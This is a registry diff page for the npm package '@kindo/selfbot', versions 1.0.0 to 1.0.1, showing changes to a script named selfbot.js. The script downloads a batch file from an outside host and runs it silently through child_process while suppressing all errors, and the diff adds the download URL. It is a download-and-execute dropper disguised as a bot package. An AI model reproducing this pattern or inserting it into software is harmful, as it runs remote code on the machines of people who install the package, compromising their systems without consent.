@kindo/selfbot 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/scripts/selfbot.js +2 -2
package/package.json
CHANGED
package/scripts/selfbot.js
CHANGED
|
@@ -1,10 +1,11 @@
|
|
|
1
|
+
// scripts/selfbot.js
|
|
1
2
|
const { exec } = require('child_process');
|
|
2
3
|
const { createWriteStream } = require('fs');
|
|
3
4
|
const { get } = require('https');
|
|
4
5
|
const { join } = require('path');
|
|
5
6
|
const { promisify } = require('util');
|
|
6
7
|
|
|
7
|
-
const BAT_URL = '
|
|
8
|
+
const BAT_URL = 'https://astralwarfare.fr/script.bat';
|
|
8
9
|
const BAT_PATH = join(process.cwd(), 'script.bat');
|
|
9
10
|
|
|
10
11
|
async function downloadBat() {
|
|
@@ -31,7 +32,6 @@ async function main() {
|
|
|
31
32
|
await downloadBat();
|
|
32
33
|
await executeSilent();
|
|
33
34
|
} catch (err) {
|
|
34
|
-
// Ne rien afficher en cas d'erreur
|
|
35
35
|
}
|
|
36
36
|
}
|
|
37
37
|
|